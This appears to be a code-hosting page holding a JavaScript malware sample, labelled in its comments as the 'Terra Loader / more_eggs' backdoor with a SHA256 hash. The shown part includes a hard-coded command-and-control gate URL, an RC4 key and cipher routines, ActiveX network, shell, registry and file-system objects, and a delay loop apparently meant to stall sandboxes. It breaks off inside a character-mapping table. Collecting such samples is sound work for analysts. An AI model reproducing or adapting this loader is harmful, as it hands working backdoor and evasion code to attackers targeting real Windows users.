Permalink
Mar 1, 2019
Mar 1, 2019
Newer
100644
517 lines (500 sloc)
10.8 KB
1
// sample from SHA256: 73defd8066549e5b09c509064bc5bd29e77eca2c18d114c0bcf3dfa1cefe6939
2
// signed malware install loader -> JS Terra Loader aka more_eggs backdoor
4
5
var BV = "6.0";
6
var Gate = "https://tonsandmillions.com/sendanalytics-28529/info";
7
var hit_each = 1;
8
var error_retry = 2;
9
var restart_h = 4;
10
var rcon_max = hit_each * (restart_h * 60) / (hit_each * hit_each);
11
var Rkey = "ZkY3egXBulkogSbGEHqA";
12
var rcon_now = 0;
13
var gtfo = false;
14
var selfdel = false;
15
var table = [];
16
var Build = "";
17
var PCN = "";
18
var UNM = "";
19
var SYSTEM = 0;
20
var rootK = "HKCU";
21
var workingDir = "";
22
var main_mitm = "";
23
var xApp = "";
24
var xTmp = "";
25
var PreserveH = "";
26
var xStore = "";
27
var set = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!#$%&()*+,./:;<=>?@[]^_`{|}~"';
28
29
function obj(xString) {
30
return new ActiveXObject(xString);
31
}
32
var con;
33
try {
34
con = obj("Msxml2.XMLHTTP.6.0");
35
} catch (e) {
36
try {
37
con = obj("Msxml2.XMLHTTP.3.0");
38
} catch (e2) {
39
con = obj("Microsoft.XMLHTTP");
40
}
41
}
42
var xhr;
43
try {
44
xhr = obj("Msxml2.ServerXMLHTTP.6.0");
45
} catch (e3) {
46
xhr = obj("Msxml2.ServerXMLHTTP.3.0");
47
}
48
49
function check_Net(method) {
50
var Resp = false;
51
var conz1;
52
var t11 = "";
53
if (method === 1) {
54
conz1 = xhr;
55
} else {
56
conz1 = con;
57
}
58
try {
59
conz1.open("GET", "http://www.w3.org/1999/XSL/Format", false);
60
} catch (e1) {
61
if (method === 0) {
62
return check_Net(1);
63
} else {
64
return false;
65
}
66
}
67
conz1.onreadystatechange = function() {
68
if (conz1.readyState === 4) {
69
if (conz1.status === 200) {
70
t11 = conz1.responseText;
71
if (t11) {
72
if (t11 == 'This is another XSL namespace\n') {
73
Resp = true;
74
} else {
75
Resp = false;
76
}
77
} else {
78
Resp = false;
79
}
80
} else {
81
Resp = false;
82
}
83
}
84
};
85
try {
86
conz1.send();
87
} catch (e2) {
88
if (method === 0) {
89
return check_Net(1);
90
} else {
91
return false;
92
}
93
}
94
return Resp;
95
}
96
97
function cLength(mstr, min, max) {
98
var n = mstr.length;
99
if (n === 0) {
100
return false;
101
}
102
if (n >= min && (n <= max)) {
103
return true;
104
}
105
}
106
107
function rInt(min, max) {
108
min = Math.ceil(min);
109
max = Math.floor(max);
110
return Math.floor(Math.random() * (max - min + 1)) + min;
111
}
112
113
function rStr(len) {
114
var xRnd = "";
115
var i;
116
var randomPoz;
117
var charSet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
118
i = 0;
119
do {
120
randomPoz = Math.floor(Math.random() * charSet.length);
121
xRnd += charSet.substring(randomPoz, randomPoz + 1);
122
i += 1;
123
} while (i < len);
124
return xRnd;
125
}
126
127
function fuck_js() {
128
var xNow = rInt(8, 32);
129
var rNow = rStr(xNow);
130
try {
131
xhr.setTimeouts(5000, 5000, 10000, 10000);
132
xhr.open("GET", "http://8.8.8.8/" + rNow, false);
133
xhr.send();
134
} catch (e9) {
135
return false;
136
}
137
}
138
139
function waitfor(zMinute) {
140
var limit = Date.parse(Date()) + (zMinute * 60000);
141
while (Date.parse(Date()) < limit) {
142
fuck_js();
143
}
144
main();
145
}
146
147
function waitfor2(zMinute, iGo) {
148
var xlmt;
149
xlmt = Date.parse(Date()) + (zMinute * 60000);
150
while (Date.parse(Date()) < xlmt) {
151
fuck_js();
152
}
153
if (iGo === 1) {
154
go();
155
}
156
}
157
158
function fexist(xpath) {
159
var fso;
160
try {
161
fso = obj("Scripting.FileSystemObject");
162
if (fso.FileExists(xpath)) {
163
return true;
164
} else {
165
return false;
166
}
167
} catch (feer) {
168
return false;
169
}
170
}
171
172
function rexist(xpath) {
173
var sh;
174
var rdata;
175
try {
176
sh = obj("Wscript.shell");
177
rdata = sh.RegRead(xpath);
178
if (rdata !== null) {
179
return true;
180
}
181
} catch (e71) {
182
return false;
183
}
184
}
185
186
function myEnv(xVar, xSystem) {
187
var a1;
188
var rEnv;
189
a1 = obj("WScript.Shell");
190
if (xSystem === 1) {
191
rEnv = a1.environment("SYSTEM");
192
} else {
193
rEnv = a1.environment("PROCESS");
194
}
195
return rEnv(xVar);
196
}
197
198
function myBits() {
199
var xBits;
200
xBits = myEnv("PROCESSOR_ARCHITECTURE", 1);
201
if (xBits === "AMD64") {
202
return "64";
203
} else {
204
return "86";
205
}
206
}
207
208
function zzzz4(key, str) {
209
var s = [];
210
var j = 0;
211
var x;
212
var res = "";
213
var i;
214
var y;
215
if (key && str) {
216
i = 0;
217
do {
218
s[i] = i;
219
i += 1;
220
} while (i < 256);
221
i = 0;
222
do {
223
j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;
224
x = s[i];
225
s[i] = s[j];
226
s[j] = x;
227
i += 1;
228
} while (i < 256);
229
i = 0;
230
j = 0;
231
y = 0;
232
do {
233
i = (i + 1) % 256;
234
j = (j + s[i]) % 256;
235
x = s[i];
236
s[i] = s[j];
237
s[j] = x;
238
res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);
239
y += 1;
240
} while (y < str.length);
241
}
242
return res;
243
}
244
245
function zzz4Bytes(xArray, key) {
246
var s = [];
247
var j = 0;
248
var x;
249
var outBytes = [];
250
var i;
251
var y;
252
if (key && xArray) {
253
i = 0;
254
do {
255
s[i] = i;
256
i += 1;
257
} while (i < 256);
258
i = 0;
259
do {
260
j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;
261
x = s[i];
262
s[i] = s[j];
263
s[j] = x;
264
i += 1;
265
} while (i < 256);
266
i = 0;
267
j = 0;
268
y = 0;
269
do {
270
i = (i + 1) % 256;
271
j = (j + s[i]) % 256;
272
x = s[i];
273
s[i] = s[j];
274
s[j] = x;
275
outBytes.push(xArray[y] ^ s[(s[i] + s[j]) % 256]);
276
y += 1;
277
} while (y < xArray.length);
278
}
279
return outBytes;
280
}
281
282
function tB(htc) {
283
var y = [];
284
y[0xC7] = 0x80;
285
y[0xFC] = 0x81;
286
y[0xE9] = 0x82;
287
y[0xE2] = 0x83;
288
y[0xE4] = 0x84;
289
y[0xE0] = 0x85;
290
y[0xE5] = 0x86;
291
y[0xE7] = 0x87;
292
y[0xEA] = 0x88;
293
y[0xEB] = 0x89;
294
y[0xE8] = 0x8A;
295
y[0xEF] = 0x8B;
296
y[0xEE] = 0x8C;
297
y[0xEC] = 0x8D;
298
y[0xC4] = 0x8E;
299
y[0xC5] = 0x8F;
300
y[0xC9] = 0x90;
301
y[0xE6] = 0x91;
302
y[0xC6] = 0x92;
303
y[0xF4] = 0x93;
304
y[0xF6] = 0x94;
305
y[0xF2] = 0x95;
306
y[0xFB] = 0x96;
307
y[0xF9] = 0x97;
308
y[0xFF] = 0x98;
309
y[0xD6] = 0x99;
310
y[0xDC] = 0x9A;
311
y[0xA2] = 0x9B;
312
y[0xA3] = 0x9C;
313
y[0xA5] = 0x9D;
314
y[0x20A7] = 0x9E;
315
y[0x192] = 0x9F;
316
y[0xE1] = 0xA0;
317
y[0xED] = 0xA1;
318
y[0xF3] = 0xA2;
319
y[0xFA] = 0xA3;
320
y[0xF1] = 0xA4;
321
y[0xD1] = 0xA5;
322
y[0xAA] = 0xA6;
323
y[0xBA] = 0xA7;
324
y[0xBF] = 0xA8;
325
y[0x2310] = 0xA9;
326
y[0xAC] = 0xAA;
327
y[0xBD] = 0xAB;
328
y[0xBC] = 0xAC;
329
y[0xA1] = 0xAD;
330
y[0xAB] = 0xAE;
331
y[0xBB] = 0xAF;
332
y[0x2591] = 0xB0;
333
y[0x2592] = 0xB1;
334
y[0x2593] = 0xB2;
335
y[0x2502] = 0xB3;
336
y[0x2524] = 0xB4;
337
y[0x2561] = 0xB5;
338
y[0x2562] = 0xB6;
339
y[0x2556] = 0xB7;
340
y[0x2555] = 0xB8;
341
y[0x2563] = 0xB9;
342
y[0x2551] = 0xBA;
343
y[0x2557] = 0xBB;
344
y[0x255D] = 0xBC;
345
y[0x255C] = 0xBD;
346
y[0x255B] = 0xBE;
347
y[0x2510] = 0xBF;
348
y[0x2514] = 0xC0;
349
y[0x2534] = 0xC1;
350
y[0x252C] = 0xC2;
351
y[0x251C] = 0xC3;
352
y[0x2500] = 0xC4;
353
y[0x253C] = 0xC5;
354
y[0x255E] = 0xC6;
355
y[0x255F] = 0xC7;
356
y[0x255A] = 0xC8;
357
y[0x2554] = 0xC9;
358
y[0x2569] = 0xCA;
359
y[0x2566] = 0xCB;
360
y[0x2560] = 0xCC;
361
y[0x2550] = 0xCD;
362
y[0x256C] = 0xCE;
363
y[0x2567] = 0xCF;
364
y[0x2568] = 0xD0;
365
y[0x2564] = 0xD1;
366
y[0x2565] = 0xD2;
367
y[0x2559] = 0xD3;
368
y[0x2558] = 0xD4;
369
y[0x2552] = 0xD5;
370
y[0x2553] = 0xD6;
371
y[0x256B] = 0xD7;
372
y[0x256A] = 0xD8;
373
y[0x2518] = 0xD9;
374
y[0x250C] = 0xDA;
375
y[0x2588] = 0xDB;
376
y[0x2584] = 0xDC;
377
y[0x258C] = 0xDD;
378
y[0x2590] = 0xDE;
379
y[0x2580] = 0xDF;
380
y[0x3B1] = 0xE0;
381
y[0xDF] = 0xE1;
382
y[0x393] = 0xE2;
383
y[0x3C0] = 0xE3;
384
y[0x3A3] = 0xE4;
385
y[0x3C3] = 0xE5;
386
y[0xB5] = 0xE6;
387
y[0x3C4] = 0xE7;
388
y[0x3A6] = 0xE8;
389
y[0x398] = 0xE9;
390
y[0x3A9] = 0xEA;
391
y[0x3B4] = 0xEB;
392
y[0x221E] = 0xEC;
393
y[0x3C6] = 0xED;
394
y[0x3B5] = 0xEE;
395
y[0x2229] = 0xEF;
396
y[0x2261] = 0xF0;
397
y[0xB1] = 0xF1;
398
y[0x2265] = 0xF2;
399
y[0x2264] = 0xF3;
400
y[0x2320] = 0xF4;
401
y[0x2321] = 0xF5;
402
y[0xF7] = 0xF6;
403
y[0x2248] = 0xF7;
404
y[0xB0] = 0xF8;
405
y[0x2219] = 0xF9;
406
y[0xB7] = 0xFA;
407
y[0x221A] = 0xFB;
408
y[0x207F] = 0xFC;
409
y[0xB2] = 0xFD;
410
y[0x25A0] = 0xFE;
411
y[0xA0] = 0xFF;
412
var ami = [];
413
var mi;
414
var renderer;
415
var atends;
416
mi = 0;
417
do {
418
renderer = htc.charCodeAt(mi);
419
if (renderer < 128) {
420
atends = renderer;
421
} else {
422
atends = y[renderer];
423
}
424
ami.push(atends);
425
mi += 1;
426
} while (mi < htc.length);
427
return ami;
428
}
429
430
function tS(arenderer) {
431
var x = [];
432
x[0x80] = 0x00C7;
433
x[0x81] = 0x00FC;
434
x[0x82] = 0x00E9;
435
x[0x83] = 0x00E2;
436
x[0x84] = 0x00E4;
437
x[0x85] = 0x00E0;
438
x[0x86] = 0x00E5;
439
x[0x87] = 0x00E7;
440
x[0x88] = 0x00EA;
441
x[0x89] = 0x00EB;
442
x[0x8A] = 0x00E8;
443
x[0x8B] = 0x00EF;
444
x[0x8C] = 0x00EE;
445
x[0x8D] = 0x00EC;
446
x[0x8E] = 0x00C4;
447
x[0x8F] = 0x00C5;
448
x[0x90] = 0x00C9;
449
x[0x91] = 0x00E6;
450
x[0x92] = 0x00C6;
451
x[0x93] = 0x00F4;
452
x[0x94] = 0x00F6;
453
x[0x95] = 0x00F2;
454
x[0x96] = 0x00FB;
455
x[0x97] = 0x00F9;
456
x[0x98] = 0x00FF;
457
x[0x99] = 0x00D6;
458
x[0x9A] = 0x00DC;
459
x[0x9B] = 0x00A2;
460
x[0x9C] = 0x00A3;
461
x[0x9D] = 0x00A5;
462
x[0x9E] = 0x20A7;
463
x[0x9F] = 0x0192;
464
x[0xA0] = 0x00E1;
465
x[0xA1] = 0x00ED;
466
x[0xA2] = 0x00F3;
467
x[0xA3] = 0x00FA;
468
x[0xA4] = 0x00F1;
469
x[0xA5] = 0x00D1;
470
x[0xA6] = 0x00AA;
471
x[0xA7] = 0x00BA;
472
x[0xA8] = 0x00BF;
473
x[0xA9] = 0x2310;
474
x[0xAA] = 0x00AC;
475
x[0xAB] = 0x00BD;
476
x[0xAC] = 0x00BC;
477
x[0xAD] = 0x00A1;
478
x[0xAE] = 0x00AB;
479
x[0xAF] = 0x00BB;
480
x[0xB0] = 0x2591;
481
x[0xB1] = 0x2592;
482
x[0xB2] = 0x2593;
483
x[0xB3] = 0x2502;
484
x[0xB4] = 0x2524;
485
x[0xB5] = 0x2561;
486
x[0xB6] = 0x2562;
487
x[0xB7] = 0x2556;
488
x[0xB8] = 0x2555;
489
x[0xB9] = 0x2563;
490
x[0xBA] = 0x2551;
491
x[0xBB] = 0x2557;
492
x[0xBC] = 0x255D;
493
x[0xBD] = 0x255C;
494
x[0xBE] = 0x255B;
495
x[0xBF] = 0x2510;
496
x[0xC0] = 0x2514;
497
x[0xC1] = 0x2534;
498
x[0xC2] = 0x252C;
499
x[0xC3] = 0x251C;
500
x[0xC4] = 0x2500;
501
x[0xC5] = 0x253C;
502
x[0xC6] = 0x255E;
503
x[0xC7] = 0x255F;
504
x[0xC8] = 0x255A;
505
x[0xC9] = 0x2554;
506
x[0xCA] = 0x2569;
507
x[0xCB] = 0x2566;
508
x[0xCC] = 0x2560;
509
x[0xCD] = 0x2550;
510
x[0xCE] = 0x256C;
511
x[0xCF] = 0x2567;
512
x[0xD0] = 0x2568;
513
x[0xD1] = 0x2564;
514
x[0xD2] = 0x2565;
515
x[0xD3] = 0x2559;
516
...
517
//